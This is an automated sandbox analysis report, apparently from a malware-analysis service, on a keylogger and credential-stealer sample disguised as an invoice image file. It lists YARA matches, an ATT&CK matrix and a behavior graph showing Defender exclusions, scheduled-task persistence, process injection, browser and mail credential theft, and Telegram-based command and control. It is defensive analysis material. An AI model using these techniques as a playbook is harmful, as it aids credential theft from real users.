                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.Native_New-Nova.exe.7693e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR
                      Yara detected VIP Keylogger
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts3
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		112
                      Process Injection                      		11
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		1
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		Logon Script (Windows)1
                      Scheduled Task/Job                      		14
                      Obfuscated Files or Information                      		Security Account Manager34
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing                      		NTDS141
                      Security Software Discovery                      		Distributed Component Object Model1
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets41
                      Virtualization/Sandbox Evasion                      		SSH1
                      Clipboard Data                      		14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                      Masquerading                      		Cached Domain Credentials3
                      Process Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632428 Sample: RFQ_PO_98473009.png.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 63 reallyfreegeoip.org 2->63 65 api.telegram.org 2->65 67 2 other IPs or domains 2->67 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 97 17 other signatures 2->97 8 RFQ_PO_98473009.png.exe 7 2->8         started        12 lVbhkOPdhyxT.exe 2->12         started        14 svchost.exe 2->14         started        signatures3 93 Tries to detect the country of the analysis system (by using the IP) 63->93 95 Uses the Telegram API (likely for C&C communication) 65->95 process4 dnsIp5 55 C:\Users\user\AppData\...\lVbhkOPdhyxT.exe, PE32 8->55 dropped 57 C:\Users\...\lVbhkOPdhyxT.exe:Zone.Identifier, ASCII 8->57 dropped 59 C:\Users\user\AppData\Local\...\tmp2D18.tmp, XML 8->59 dropped 61 C:\Users\user\...\RFQ_PO_98473009.png.exe.log, ASCII 8->61 dropped 101 Uses schtasks.exe or at.exe to add and modify task schedules 8->101 103 Adds a directory exclusion to Windows Defender 8->103 105 Injects a PE file into a foreign processes 8->105 17 RFQ_PO_98473009.png.exe 3 8->17         started        20 powershell.exe 23 8->20         started        23 powershell.exe 23 8->23         started        29 3 other processes 8->29 107 Antivirus detection for dropped file 12->107 109 Multi AV Scanner detection for dropped file 12->109 25 lVbhkOPdhyxT.exe 12->25         started        27 schtasks.exe 12->27         started        69 127.0.0.1 unknown unknown 14->69 file6 signatures7 process8 file9 51 C:\Users\user\AppData\...51ative_snake01.exe, PE32 17->51 dropped 53 C:\Users\user\AppData\...53ative_New-Nova.exe, PE32 17->53 dropped 31 Native_New-Nova.exe 14 2 17->31         started        35 Native_snake01.exe 17->35         started        99 Loading BitLocker PowerShell Module 20->99 37 conhost.exe 20->37         started        39 WmiPrvSE.exe 20->39         started        41 conhost.exe 23->41         started        43 Native_snake01.exe 25->43         started        45 Native_New-Nova.exe 25->45         started        47 conhost.exe 27->47         started        49 conhost.exe 29->49         started        signatures10 process11 dnsIp12 71 reallyfreegeoip.org 104.21.64.1, 443, 49715, 49716 CLOUDFLARENETUS United States 31->71 79 Antivirus detection for dropped file 31->79 81 Multi AV Scanner detection for dropped file 31->81 83 Tries to steal Mail credentials (via file / registry access) 31->83 73 api.telegram.org 149.154.167.220, 443, 49753, 49759 TELEGRAMRU United Kingdom 35->73 75 checkip.dyndns.com 193.122.130.0, 49713, 49714, 49719 ORACLE-BMC-31898US United States 35->75 77 132.226.247.73, 49755, 49757, 80 UTMEMUS United States 43->77 85 Tries to harvest and steal browser information (history, passwords, etc) 43->85 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.